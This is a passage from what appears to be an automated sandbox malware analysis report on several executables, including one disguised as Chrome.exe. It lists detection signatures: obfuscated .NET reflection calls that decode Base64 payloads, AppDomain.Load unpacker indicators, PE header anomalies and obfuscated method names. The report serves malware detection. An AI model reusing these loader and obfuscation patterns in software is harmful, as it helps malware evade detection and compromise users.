                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.P2mf0VG3Z23btQPXTeWoUc4EnGWDH0AGfRKMOWI7J68yK4pVMLXPcLhXhC1hvImrGy0Aey4H2ZuiulBcjOpQ,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.uVzSMwhr8uVTudA4B6vvjwlelEqBmYLIYhH2FdSzaOrmofSlnrIHz0lRml90KCcWtXLQuC7t5pv5yHiCL8Hz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.O1fUh2FqK9YKCXNjVlTAAUZqudBCNKzcmUJuKR8FE4aS3eLyvMiTd2jQ4fdorMK2j9Xac95SEFhJw47CHfCz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.ljCPR1FH8j5yhPI3U9x904OUGdp6iZBBNsKDyUw5nryMnhOyjPQGVMgHek2YxCtwVQKj60buvcDDomD1uqJO,_7DAslXk4aRGtCt1oeUw5TeOhtE._4143yORnHD1dsEVvA8EAP2Yg0h()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QBTQa3EkUuQM9en7BwZr2kZOc9[2],_7DAslXk4aRGtCt1oeUw5TeOhtE._1yCi8e7NkC4yKRwRiC8QMqlmos(Convert.FromBase64String(QBTQa3EkUuQM9en7BwZr2kZOc9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QBTQa3EkUuQM9en7BwZr2kZOc9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.P2mf0VG3Z23btQPXTeWoUc4EnGWDH0AGfRKMOWI7J68yK4pVMLXPcLhXhC1hvImrGy0Aey4H2ZuiulBcjOpQ,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.uVzSMwhr8uVTudA4B6vvjwlelEqBmYLIYhH2FdSzaOrmofSlnrIHz0lRml90KCcWtXLQuC7t5pv5yHiCL8Hz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.O1fUh2FqK9YKCXNjVlTAAUZqudBCNKzcmUJuKR8FE4aS3eLyvMiTd2jQ4fdorMK2j9Xac95SEFhJw47CHfCz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.ljCPR1FH8j5yhPI3U9x904OUGdp6iZBBNsKDyUw5nryMnhOyjPQGVMgHek2YxCtwVQKj60buvcDDomD1uqJO,_7DAslXk4aRGtCt1oeUw5TeOhtE._4143yORnHD1dsEVvA8EAP2Yg0h()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QBTQa3EkUuQM9en7BwZr2kZOc9[2],_7DAslXk4aRGtCt1oeUw5TeOhtE._1yCi8e7NkC4yKRwRiC8QMqlmos(Convert.FromBase64String(QBTQa3EkUuQM9en7BwZr2kZOc9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QBTQa3EkUuQM9en7BwZr2kZOc9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        .NET source code contains potential unpacker
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _7TYyauswT86zftRyKQ8xrzJIDf System.AppDomain.Load(byte[])
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6 System.AppDomain.Load(byte[])
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _7TYyauswT86zftRyKQ8xrzJIDf System.AppDomain.Load(byte[])
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6 System.AppDomain.Load(byte[])
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _7TYyauswT86zftRyKQ8xrzJIDf System.AppDomain.Load(byte[])
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6 System.AppDomain.Load(byte[])
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _7TYyauswT86zftRyKQ8xrzJIDf System.AppDomain.Load(byte[])
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6 System.AppDomain.Load(byte[])
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6
                        Source: M2.exe.1.drStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                        Source: f5ATZ1i5CU.exeStatic PE information: real checksum: 0x3ca9f should be: 0x41ded
                        Source: M2.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x1a5fb
                        Source: Chrome.exe.9.drStatic PE information: real checksum: 0x0 should be: 0xe5c2
                        Source: Metin.exe.1.drStatic PE information: real checksum: 0x0 should be: 0xe5c2
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03616348 pushad ; ret 2_2_03616351
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03616F17 pushad ; ret 2_2_03616F23
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03613D1D push edx; retn 0008h2_2_03613D32
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08EE8BE0 push esi; ret 2_2_08EE8BFA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08EE8B50 push esi; ret 2_2_08EE8C0A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08EE6477 push cs; ret 2_2_08EE6482
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08EE8C05 push esi; ret 2_2_08EE8C0A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08EE8C10 push edi; ret 2_2_08EE8C1A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08EE7E1F push ds; ret 2_2_08EE7E7A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF7C131D2A5 pushad ; iretd 14_2_00007FF7C131D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF7C1502316 push 8B485F93h; iretd 14_2_00007FF7C150231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF7C133D2A5 pushad ; iretd 17_2_00007FF7C133D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF7C14519D2 pushad ; ret 17_2_00007FF7C14519E1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF7C1522316 push 8B485F91h; iretd 17_2_00007FF7C152231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF7C132D2A5 pushad ; iretd 19_2_00007FF7C132D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF7C1512316 push 8B485F92h; iretd 19_2_00007FF7C151231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF7C1517CED push eax; retf 19_2_00007FF7C1517D79
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF7C131D2A5 pushad ; iretd 21_2_00007FF7C131D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF7C1502316 push 8B485F93h; iretd 21_2_00007FF7C150231B
                        Source: Metin.exe.1.dr, dazezEcwr0A.csHigh entropy of concatenated method names: 'aKOKhWYwtoW', 'H8Glx8h0Mjh', '_5QPXgmKx9qo', 'qPUK1j4Gqoi', 'ZtP91vURdbr', 'H6IDy1VL8ne', 'MCcmTBX9zQB', '_2bjQuWOTufu', 'iDnbezOk2tO', 'atxoJabdobz'
                        Source: Metin.exe.1.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.csHigh entropy of concatenated method names: '_6hM5mhvnvqi8EQv8aqcMhwBp5j', 'dkHP53EHT9Tgbz0eAmv0r0cgOQ', 'UsVk845tQCxo4xR6s1OQdHOKc0', 'WVGrX23G1VOHerQKuHnyZ2rCBx', 'Wb1K0KKUsUHT8yC2Rcrq240bob', 'xOOBtmV0Qvc8XTPjCEqS4OHudY', '_9LWxl96OWZ7HqaFDcOOQgm2uiJ', 'PVkMZKIOuEHlylQqZJYsKEZmxX', 'fNQC3puLuugyOsbmAymCPodhun', 'VWc3iIdSKohaLELHNQ61pmJIw9'
                        Source: Metin.exe.1.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csHigh entropy of concatenated method names: 'qBG4YjBu9fKCdUAkpoTm83d5xT', 'otLJJVKQwkaeWh1tlM5SAGhHjX', 'Tduwzzk82NV5Ip1fqrVRcvyqvR', 'w6dIIii0P31La7A87JoE4s7qGM', 'DDNmv9S9Y9oNN3B3U6X7Mi7kZD', 'tYN8FiHFUcnZKujzVqNzssFFZV', 'QJqEV1MrOamoiwC6L0IShLMHVX', 'yxEAv3YHUq4naaroDSiOjB7zte', 'OSWKG17JEYjpGynQChpniul9lf', 'L0ZdfV1y8S8yH5Fi4YfVmGy3Xh'
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.csHigh entropy of concatenated method names: 'cqsyE9KjymyOtnQS31JrNx4AGt', '_7TYyauswT86zftRyKQ8xrzJIDf', 'rqU7KdOPp6E34astOl8Da4rfGn', 'Wqc7oouvc5fdXodGRYQOHes0Bz', 'pUd7Cq1QOSMOKo7goh5O7QX9Mq', 'izExbYSk3vHNlVkWgNVAdOD0ch', 'I896fyzILNfr5tr8g3hLyCbKTs', '_4PU1bpOJbc9X46d6R5PU2bnGK2', 'qCaGErrmK2vZRsft8w4JwYW32r', 'uZ3g9qOP8gHu2BDLBS4zH0WsPv'
                        Source: Metin.exe.1.dr, KNnYBtToP0VH22pwbP5VW1oo8fxLkXhVdblh178AA83QbLmYEDNeSJF8k0GnBAgRY4WvSVrCb0g4wF75LQSw.csHigh entropy of concatenated method names: 'Rsv5H4Yx8z1XAXzBcuVsnGKQntrBj6LK08l1FqCjeuLjb9CerA23bot3JVlTOc9OBgq8v07gMTVpHd7MX3q6', 'q6ytuxSUE6aDaxhY62f0hlYFxrexZK4LBZlaKjQ1OxQBGOifENMZ4StiRYDle0mGQkhdrILNBnV7vHOOUztQ', 'XNbNEIE5b0jiZaCknhF97V0G3TWnDP1qknWnqWcvFKq5cD8AxjS682JOKCkYAodVJcnRQyiaVPGYKfGhahVQ', 'd9qkXAGCXSSVeJCesPz5crTaOjeNjhafPU8TonzkQ9eGDI49c7rCSNJ0UwWMo5QblpJDQIZxpd6UkPFPjHsV', 'U8ivOVCanMKun9W5pj2zXcjDWEv6M4LLwM2NOBZapfTQt8908MaN0LNy6GkfJ2NQJi82RZ3sWWl5xc9ZUyNp', 'RPPMWQ3bMv8D8DgerM1IDBtB9Zg5g1OmKhSkGNepRSJSXYzBXWOixMii7oiYMk0uqSrpqPl6gEzUa4dLIGsz', 'TFDeit4HbNOXkw1IDULcZMCj3PQJd09zojYVDPLpWOwaGn3913aBw1T2cNVdxwXX41LVRJGjPEf0UYgtpcPw', 'GuFSpqCwJz6I5zRyLJcDnzbtYcc1O6kZWVGRzZhV7FPdLYJSpSgB7JfZy48dTIMMG94gDW5YtT3hkeT027bA', 'JR4BjpSpIFtprSAtF9UwPatWjdyOCLXFLCGAgv57uajvPCqLlhvwInj24mRLNDsta6WIu4s9r7g9tYNaA3Mt', 'JS4B4D0xvR2VfjEi7a0dDcLtdlJIPsWNiBqCutfFs9hY0ztG1sTGGJtK7dYwgtf25hifQPDk18yuspIGITzh'
                        Source: Metin.exe.1.dr, kd50mwQPPSzvaDpyAZGMQuS07X.csHigh entropy of concatenated method names: 'TijPMOmDRqPyHkstPEqaU4HxYU', 'rXqiFjFWbqGtiMWUDcPtDb4CHa', '_0K9X9L7rx5w0UaRjbwNwbBLOT0', 'iDnXS3Q8CyrVeNg4LKGDXMlxDS', 'ANoNxKW1m8l', 'iGKLuXJtvIr', 'vMJnKeqt5R4', 'cTepPl3HHrM', 'r3N8Z4mAy2z', '_6iEyTqnPkGM'
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, dazezEcwr0A.csHigh entropy of concatenated method names: 'aKOKhWYwtoW', 'H8Glx8h0Mjh', '_5QPXgmKx9qo', 'qPUK1j4Gqoi', 'ZtP91vURdbr', 'H6IDy1VL8ne', 'MCcmTBX9zQB', '_2bjQuWOTufu', 'iDnbezOk2tO', 'atxoJabdobz'
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.csHigh entropy of concatenated method names: '_6hM5mhvnvqi8EQv8aqcMhwBp5j', 'dkHP53EHT9Tgbz0eAmv0r0cgOQ', 'UsVk845tQCxo4xR6s1OQdHOKc0', 'WVGrX23G1VOHerQKuHnyZ2rCBx', 'Wb1K0KKUsUHT8yC2Rcrq240bob', 'xOOBtmV0Qvc8XTPjCEqS4OHudY', '_9LWxl96OWZ7HqaFDcOOQgm2uiJ', 'PVkMZKIOuEHlylQqZJYsKEZmxX', 'fNQC3puLuugyOsbmAymCPodhun', 'VWc3iIdSKohaLELHNQ61pmJIw9'
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csHigh entropy of concatenated method names: 'qBG4YjBu9fKCdUAkpoTm83d5xT', 'otLJJVKQwkaeWh1tlM5SAGhHjX', 'Tduwzzk82NV5Ip1fqrVRcvyqvR', 'w6dIIii0P31La7A87JoE4s7qGM', 'DDNmv9S9Y9oNN3B3U6X7Mi7kZD', 'tYN8FiHFUcnZKujzVqNzssFFZV', 'QJqEV1MrOamoiwC6L0IShLMHVX', 'yxEAv3YHUq4naaroDSiOjB7zte', 'OSWKG17JEYjpGynQChpniul9lf', 'L0ZdfV1y8S8yH5Fi4YfVmGy3Xh'
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.csHigh entropy of concatenated method names: 'cqsyE9KjymyOtnQS31JrNx4AGt', '_7TYyauswT86zftRyKQ8xrzJIDf', 'rqU7KdOPp6E34astOl8Da4rfGn', 'Wqc7oouvc5fdXodGRYQOHes0Bz', 'pUd7Cq1QOSMOKo7goh5O7QX9Mq', 'izExbYSk3vHNlVkWgNVAdOD0ch', 'I896fyzILNfr5tr8g3hLyCbKTs', '_4PU1bpOJbc9X46d6R5PU2bnGK2', 'qCaGErrmK2vZRsft8w4JwYW32r', 'uZ3g9qOP8gHu2BDLBS4zH0WsPv'
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, KNnYBtToP0VH22pwbP5VW1oo8fxLkXhVdblh178AA83QbLmYEDNeSJF8k0GnBAgRY4WvSVrCb0g4wF75LQSw.csHigh entropy of concatenated method names: 'Rsv5H4Yx8z1XAXzBcuVsnGKQntrBj6LK08l1FqCjeuLjb9CerA23bot3JVlTOc9OBgq8v07gMTVpHd7MX3q6', 'q6ytuxSUE6aDaxhY62f0hlYFxrexZK4LBZlaKjQ1OxQBGOifENMZ4StiRYDle0mGQkhdrILNBnV7vHOOUztQ', 'XNbNEIE5b0jiZaCknhF97V0G3TWnDP1qknWnqWcvFKq5cD8AxjS682JOKCkYAodVJcnRQyiaVPGYKfGhahVQ', 'd9qkXAGCXSSVeJCesPz5crTaOjeNjhafPU8TonzkQ9eGDI49c7rCSNJ0UwWMo5QblpJDQIZxpd6UkPFPjHsV', 'U8ivOVCanMKun9W5pj2zXcjDWEv6M4LLwM2NOBZapfTQt8908MaN0LNy6GkfJ2NQJi82RZ3sWWl5xc9ZUyNp', 'RPPMWQ3bMv8D8DgerM1IDBtB9Zg5g1OmKhSkGNepRSJSXYzBXWOixMii7oiYMk0uqSrpqPl6gEzUa4dLIGsz', 'TFDeit4HbNOXkw1IDULcZMCj3PQJd09zojYVDPLpWOwaGn3913aBw1T2cNVdxwXX41LVRJGjPEf0UYgtpcPw', 'GuFSpqCwJz6I5zRyLJcDnzbtYcc1O6kZWVGRzZhV7FPdLYJSpSgB7JfZy48dTIMMG94gDW5YtT3hkeT027bA', 'JR4BjpSpIFtprSAtF9UwPatWjdyOCLXFLCGAgv57uajvPCqLlhvwInj24mRLNDsta6WIu4s9r7g9tYNaA3Mt', 'JS4B4D0xvR2VfjEi7a0dDcLtdlJIPsWNiBqCutfFs9hY0ztG1sTGGJtK7dYwgtf25hifQPDk18yuspIGITzh'
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, kd50mwQPPSzvaDpyAZGMQuS07X.csHigh entropy of concatenated method names: 'TijPMOmDRqPyHkstPEqaU4HxYU', 'rXqiFjFWbqGtiMWUDcPtDb4CHa', '_0K9X9L7rx5w0UaRjbwNwbBLOT0', 'iDnXS3Q8CyrVeNg4LKGDXMlxDS', 'ANoNxKW1m8l', 'iGKLuXJtvIr', 'vMJnKeqt5R4', 'cTepPl3HHrM', 'r3N8Z4mAy2z', '_6iEyTqnPkGM'
                        Source: Chrome.exe.9.dr, dazezEcwr0A.csHigh entropy of concatenated method names: 'aKOKhWYwtoW', 'H8Glx8h0Mjh', '_5QPXgmKx9qo', 'qPUK1j4Gqoi', 'ZtP91vURdbr', 'H6IDy1VL8ne', 'MCcmTBX9zQB', '_2bjQuWOTufu', 'iDnbezOk2tO', 'atxoJabdobz'
                        Source: Chrome.exe.9.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.csHigh entropy of concatenated method names: '_6hM5mhvnvqi8EQv8aqcMhwBp5j', 'dkHP53EHT9Tgbz0eAmv0r0cgOQ', 'UsVk845tQCxo4xR6s1OQdHOKc0', 'WVGrX23G1VOHerQKuHnyZ2rCBx', 'Wb1K0KKUsUHT8yC2Rcrq240bob', 'xOOBtmV0Qvc8XTPjCEqS4OHudY', '_9LWxl96OWZ7HqaFDcOOQgm2uiJ', 'PVkMZKIOuEHlylQqZJYsKEZmxX', 'fNQC3puLuugyOsbmAymCPodhun', 'VWc3iIdSKohaLELHNQ61pmJIw9'
                        Source: Chrome.exe.9.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csHigh entropy of concatenated method names: 'qBG4YjBu9fKCdUAkpoTm83d5xT', 'otLJJVKQwkaeWh1tlM5SAGhHjX', 'Tduwzzk82NV5Ip1fqrVRcvyqvR', 'w6dIIii0P31La7A87JoE4s7qGM', 'DDNmv9S9Y9oNN3B3U6X7Mi7kZD', 'tYN8FiHFUcnZKujzVqNzssFFZV', 'QJqEV1MrOamoiwC6L0IShLMHVX', 'yxEAv3YHUq4naaroDSiOjB7zte', 'OSWKG17JEYjpGynQChpniul9lf', 'L0ZdfV1y8S8yH5Fi4YfVmGy3Xh'
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.csHigh entropy of concatenated method names: 'cqsyE9KjymyOtnQS31JrNx4AGt', '_7TYyauswT86zftRyKQ8xrzJIDf', 'rqU7KdOPp6E34astOl8Da4rfGn', 'Wqc7oouvc5fdXodGRYQOHes0Bz', 'pUd7Cq1QOSMOKo7goh5O7QX9Mq', 'izExbYSk3vHNlVkWgNVAdOD0ch', 'I896fyzILNfr5tr8g3hLyCbKTs', '_4PU1bpOJbc9X46d6R5PU2bnGK2', 'qCaGErrmK2vZRsft8w4JwYW32r', 'uZ3g9qOP8gHu2BDLBS4zH0WsPv'
                        Source: Chrome.exe.9.dr, KNnYBtToP0VH22pwbP5VW1oo8fxLkXhVdblh178AA83QbLmYEDNeSJF8k0GnBAgRY4WvSVrCb0g4wF75LQSw.csHigh entropy of concatenated method names: 'Rsv5H4Yx8z1XAXzBcuVsnGKQntrBj6LK08l1FqCjeuLjb9CerA23bot3JVlTOc9OBgq8v07gMTVpHd7MX3q6', 'q6ytuxSUE6aDaxhY62f0hlYFxrexZK4LBZlaKjQ1OxQBGOifENMZ4StiRYDle0mGQkhdrILNBnV7vHOOUztQ', 'XNbNEIE5b0jiZaCknhF97V0G3TWnDP1qknWnqWcvFKq5cD8AxjS682JOKCkYAodVJcnRQyiaVPGYKfGhahVQ', 'd9qkXAGCXSSVeJCesPz5crTaOjeNjhafPU8TonzkQ9eGDI49c7rCSNJ0UwWMo5QblpJDQIZxpd6UkPFPjHsV', 'U8ivOVCanMKun9W5pj2zXcjDWEv6M4LLwM2NOBZapfTQt8908MaN0LNy6GkfJ2NQJi82RZ3sWWl5xc9ZUyNp', 'RPPMWQ3bMv8D8DgerM1IDBtB9Zg5g1OmKhSkGNepRSJSXYzBXWOixMii7oiYMk0uqSrpqPl6gEzUa4dLIGsz', 'TFDeit4HbNOXkw1IDULcZMCj3PQJd09zojYVDPLpWOwaGn3913aBw1T2cNVdxwXX41LVRJGjPEf0UYgtpcPw', 'GuFSpqCwJz6I5zRyLJcDnzbtYcc1O6kZWVGRzZhV7FPdLYJSpSgB7JfZy48dTIMMG94gDW5YtT3hkeT027bA', 'JR4BjpSpIFtprSAtF9UwPatWjdyOCLXFLCGAgv57uajvPCqLlhvwInj24mRLNDsta6WIu4s9r7g9tYNaA3Mt', 'JS4B4D0xvR2VfjEi7a0dDcLtdlJIPsWNiBqCutfFs9hY0ztG1sTGGJtK7dYwgtf25hifQPDk18yuspIGITzh'
                        Source: Chrome.exe.9.dr, kd50mwQPPSzvaDpyAZGMQuS07X.csHigh entropy of concatenated method names: 'TijPMOmDRqPyHkstPEqaU4HxYU', 'rXqiFjFWbqGtiMWUDcPtDb4CHa', '_0K9X9L7rx5w0UaRjbwNwbBLOT0', 'iDnXS3Q8CyrVeNg4LKGDXMlxDS', 'ANoNxKW1m8l', 'iGKLuXJtvIr', 'vMJnKeqt5R4', 'cTepPl3HHrM', 'r3N8Z4mAy2z', '_6iEyTqnPkGM'
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, dazezEcwr0A.csHigh entropy of concatenated method names: 'aKOKhWYwtoW', 'H8Glx8h0Mjh', '_5QPXgmKx9qo', 'qPUK1j4Gqoi', 'ZtP91vURdbr', 'H6IDy1VL8ne', 'MCcmTBX9zQB', '_2bjQuWOTufu', 'iDnbezOk2tO', 'atxoJabdobz'
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.csHigh entropy of concatenated method names: '_6hM5mhvnvqi8EQv8aqcMhwBp5j', 'dkHP53EHT9Tgbz0eAmv0r0cgOQ', 'UsVk845tQCxo4xR6s1OQdHOKc0', 'WVGrX23G1VOHerQKuHnyZ2rCBx', 'Wb1K0KKUsUHT8yC2Rcrq240bob', 'xOOBtmV0Qvc8XTPjCEqS4OHudY', '_9LWxl96OWZ7HqaFDcOOQgm2uiJ', 'PVkMZKIOuEHlylQqZJYsKEZmxX', 'fNQC3puLuugyOsbmAymCPodhun', 'VWc3iIdSKohaLELHNQ61pmJIw9'
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csHigh entropy of concatenated method names: 'qBG4YjBu9fKCdUAkpoTm83d5xT', 'otLJJVKQwkaeWh1tlM5SAGhHjX', 'Tduwzzk82NV5Ip1fqrVRcvyqvR', 'w6dIIii0P31La7A87JoE4s7qGM', 'DDNmv9S9Y9oNN3B3U6X7Mi7kZD', 'tYN8FiHFUcnZKujzVqNzssFFZV', 'QJqEV1MrOamoiwC6L0IShLMHVX', 'yxEAv3YHUq4naaroDSiOjB7zte', 'OSWKG17JEYjpGynQChpniul9lf', 'L0ZdfV1y8S8yH5Fi4YfVmGy3Xh'
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.csHigh entropy of concatenated method names: 'cqsyE9KjymyOtnQS31JrNx4AGt', '_7TYyauswT86zftRyKQ8xrzJIDf', 'rqU7KdOPp6E34astOl8Da4rfGn', 'Wqc7oouvc5fdXodGRYQOHes0Bz', 'pUd7Cq1QOSMOKo7goh5O7QX9Mq', 'izExbYSk3vHNlVkWgNVAdOD0ch', 'I896fyzILNfr5tr8g3hLyCbKTs', '_4PU1bpOJbc9X46d6R5PU2bnGK2', 'qCaGErrmK2vZRsft8w4JwYW32r', 'uZ3g9qOP8gHu2BDLBS4zH0WsPv'
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, KNnYBtToP0VH22pwbP5VW1oo8fxLkXhVdblh178AA83QbLmYEDNeSJF8k0GnBAgRY4WvSVrCb0g4wF75LQSw.csHigh entropy of concatenated method names: 'Rsv5H4Yx8z1XAXzBcuVsnGKQntrBj6LK08l1FqCjeuLjb9CerA23bot3JVlTOc9OBgq8v07gMTVpHd7MX3q6', 'q6ytuxSUE6aDaxhY62f0hlYFxrexZK4LBZlaKjQ1OxQBGOifENMZ4StiRYDle0mGQkhdrILNBnV7vHOOUztQ', 'XNbNEIE5b0jiZaCknhF97V0G3TWnDP1qknWnqWcvFKq5cD8AxjS682JOKCkYAodVJcnRQyiaVPGYKfGhahVQ', 'd9qkXAGCXSSVeJCesPz5crTaOjeNjhafPU8TonzkQ9eGDI49c7rCSNJ0UwWMo5QblpJDQIZxpd6UkPFPjHsV', 'U8ivOVCanMKun9W5pj2zXcjDWEv6M4LLwM2NOBZapfTQt8908MaN0LNy6GkfJ2NQJi82RZ3sWWl5xc9ZUyNp', 'RPPMWQ3bMv8D8DgerM1IDBtB9Zg5g1OmKhSkGNepRSJSXYzBXWOixMii7oiYMk0uqSrpqPl6gEzUa4dLIGsz', 'TFDeit4HbNOXkw1IDULcZMCj3PQJd09zojYVDPLpWOwaGn3913aBw1T2cNVdxwXX41LVRJGjPEf0UYgtpcPw', 'GuFSpqCwJz6I5zRyLJcDnzbtYcc1O6kZWVGRzZhV7FPdLYJSpSgB7JfZy48dTIMMG94gDW5YtT3hkeT027bA', 'JR4BjpSpIFtprSAtF9UwPatWjdyOCLXFLCGAgv57uajvPCqLlhvwInj24mRLNDsta6WIu4s9r7g9tYNaA3Mt', 